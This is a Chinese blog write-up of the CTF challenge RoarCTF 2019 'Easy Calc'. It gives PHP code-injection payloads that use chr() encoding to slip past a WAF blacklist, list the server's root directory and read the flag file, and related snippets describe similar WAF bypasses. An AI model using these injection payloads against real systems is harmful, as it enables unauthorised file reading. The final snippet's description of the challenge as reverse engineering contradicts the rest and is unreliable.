BUUCTF [RoarCTF 2019]Easy Calc

最新推荐文章于 2024-10-04 09:40:56 发布

ter_ret

最新推荐文章于 2024-10-04 09:40:56 发布

阅读量850

点赞数

分类专栏： buuctf 文章标签： buuctf

本文链接：https://blog.csdn.net/qq_53030229/article/details/121234630

版权

buuctf 专栏收录该内容

7 篇文章 0 订阅

订阅专栏

文章目录

一、 [RoarCTF 2019]Easy Calc
- 1、检查源码
- 2、利用PHP的字符串解析绕过

一、 [RoarCTF 2019]Easy Calc

1、检查源码

1、当拿到题目时，本人以为是使用Linux命令获取flag，但是尝试之后不行
在这里插入图片描述 2、检查源码，发现了calc.php，打开

在这里插入图片描述
3、打开calc.php，发现题目过滤了好多东西

2、利用PHP的字符串解析绕过

1、扫描目录下文件

scandir() 函数返回指定目录中的文件和目录的数组。
? num=print_r(scandir('/'))
# 这里由于斜杠被过滤，所以使用chr()绕过
? num=print_r(scandir(chr(47)))

在这里插入图片描述
2、读取flag

file_get_contents() 函数把整个文件读入一个字符串中。

? num=print_r(file_get_contents('/f1agg'))
由于有些东西被过滤，所以使用字符串来绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

flag{6578237a-51cc-49b9-86aa-1345497dcef1}

文章借鉴：https://blog.csdn.net/weixin_45674567/article/details/106498395,如有冒犯或错误，请及时告知，Thanks♪(･ω･)ﾉ！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ter_ret

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF [RoarCTF 2019]Easy Calc1

qq_35874748的博客

10-19

3024

一.打开题目后：二.Ctrl+U查看源代码：发现存在WAF和一个文件calc.php，这里我们就需要简单的了解下什么是WAF了： WAF的全称是（Web Application Firewall）即Web应用防火墙，简称WAF。那么WAF能做什么？ WAF可以过滤HTTP/HTTPS协议流量，防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击应用交付 CC攻击：通过大量请求对应用程序资源消耗最大的应用，如...

BUUCTF[RoarCTF 2019]Easy Calc

楼阁de猫的博客

12-23

167

[RoarCTF 2019]Easy Calc 查看源码 $("#content").val()：获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php，看看有什么这里显示了waf的过滤规则我们上传字符发现都被过滤了，这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符 2.将某些字符转换为下划线（包括空格）利用这个特性，我们就可以在num前面加一个空格，然后就能绕过waf，执行

参与评论您还未登录，请先登录后发表或查看评论

buuctf [RoarCTF 2019]Easy Calc

qq_1873822的博客

03-07

397

打开题目是一个计算器查看源码有一个 calc.php 看看题目内容，一个计算器，并且过滤了非数字的值，查看源码，上了waf，并且在calc.php显示waf的规则 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"

【BUUCTF】easy calc （PHP代码审计）

徐徐徐的博客

09-04

293

删除空白符转化特殊字符可以使用在参数名前加%20的方法进行waf绕过");");");");");读取文件内容的PHP语句将上面的函数改为即可。当对引号进行过滤时，可以使用chr()拼接的方式进行过滤。

BUUCTF [RoarCTF 2019] Easy calc

qq_43039823的博客

07-28

258

Chr("0") 为0的字符 Chr("1") Chr("2") Chr("3") Chr("4") Chr("5") Chr("6") Chr("7") 响铃 Chr("8") 回格 Chr("9") tab(水平制表符) Chr("10") 换行 Chr("11") tab(垂直制表符) Chr("12") 换页 Chr("13") 回车 chr(13)&chr(10) 回车和换行的组合 Chr("14") Chr("15") Chr("16") Chr("17

buuctf_[RoarCTF 2019]Easy Calc

weixin_46107179的博客

08-01

188

叫我们输入表达式，我们随便输入点数据，然后再答案中显示出来，感觉看不出啥来，查看源码发现.ajax;.ajax是指通过http请求加载远程数据。然后后面发现一个calc.php后面传入一个num参数；尝试看一下这个calc.php页面发现过滤了一些字符，如果能绕过，就可以用eval执行任意PHP代码；在正则表达式中对每一个黑名单来连接字符串；/m表示多行查找 /i (忽略大小写) /g (全文查找出现的所有匹配字符) /m (多行查找) /gi(全文查找、忽略大小写) /ig(全文查找、忽略大小写) 这

BUUCTF-WriteUp

鱼的博客

02-01

767

title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境，打开网址是一张滑稽，没什么用，看一下源码，发现有注释。访问source.php，直接给了源码，进行代码审计。分两块，第一块是emmm::checkFile，里面做了一些判断。第二块是一个include，文件包含，我们要绕过验证，也就是上面的checkFile方法。 hint.php include触发的三个判断.

BUUCTF-WEB

ccfly1012的博客

11-02

3923

目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页，查看一下源代

BUUCTF持续更新中

wo41ge的博客

10-19

508

目录环境我已经启动了去访问一下源码有提示去访问一下然后看到了源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (

BUUCTF：[RoarCTF 2019]Easy Calc

末初的CSDN博客

10-19

1274

题目地址：https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显，代码执行绕过，前面源码也说了有WAF，这里绕过WAF有两种方法在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过首先看下phpinfo()，禁用了一大堆函数使用scandir()函数+chr()函数绕过.

BUUCTF WEB [RoarCTF 2019]Easy Calc（小宇特详解）

小宇的web博客

01-18

758

BUUCTF WEB [RoarCTF 2019]Easy Calc（小宇特详解）打开网页后是这样的。这里先查看一下源代码这里显示是有waf的，直接访问一下calc.php来查看。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n

BUUCTF__[RoarCTF 2019]Easy Calc_题解

风过江南乱的博客

05-11

1060

一、看题拿到题目输入发现会显示简单的计算。想到是不是ssti模板注入。尝试{{1+1}}报错，行不通。 F12查看源码。发现存在WAF，访问 calc.php 。尝试访问得到源代码。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r'

buuctf-[RoarCTF 2019]Easy Calc

最新发布

m0_66169375的博客

10-04

731

chr()绕过引号，输入特定的askill的值，先用var_dump(scandir(chr(47)))查根目录的文件和目录，var_dump(file_get_contents(chr(47).f1agg))查文件内容。可以看到禁用的php函数，那么利用scandir进行目录的读取，需要注意的是/是已经被代码过滤了，需要使用chr(47)来代替，那么构造payload：var_dump(scandir(chr(47)));通过构造特定的payload，可以绕过WAF检测，读取特定文件的内容‌。

[RoarCTF 2019]Easy Calc

xj28555的博客

09-02

391

进入题目是一个计算器的功能界面查看源代码，可以发现是有WAF的，且存在一个calc.php文件这里接收一个num参数，可以看到这里创建了一个黑名单列表，然后用正则是去匹配，进行非法参数的过滤。那这题就是要绕过这个过滤和过一个WAF了。先传入一个?num=1测试一下。传入字母就会报错，这里应该是被WAF文件给拦截了。要对这WAF进行绕过，这里就涉及到一个知识点了。 PHP的字符串解析特性我们知道PHP将查询字符串（在URL或正文中）转换

BUUCTF WEB [RoarCTF 2019]Easy Calc

A_dmin的博客

12-13

5066

BUUCTF WEB [RoarCTF 2019]Easy Calc 打开网页是一个计算的！！随便输入可以计算，然后就没啥了，右键源代码：存在waf，，还有个新的页面！进行访问，看到源代码： <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ ...

[roarctf 2019]easy calc

03-16

这道题是一道简单的逆向工程题目，给出了一个计算器程序和加密后的标志，需要我们破解加密算法并计算出正确的标志。我们可以使用反编译工具对程序进行反编译，然后找到加密算法的相关代码。在这个程序中，加密算法使用了一种简单的替换算法，它会将输入字符串中的每个字符替换成固定的字符。我们只需要编写一个解密程序，使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志，我们就可以提交它来获得得分。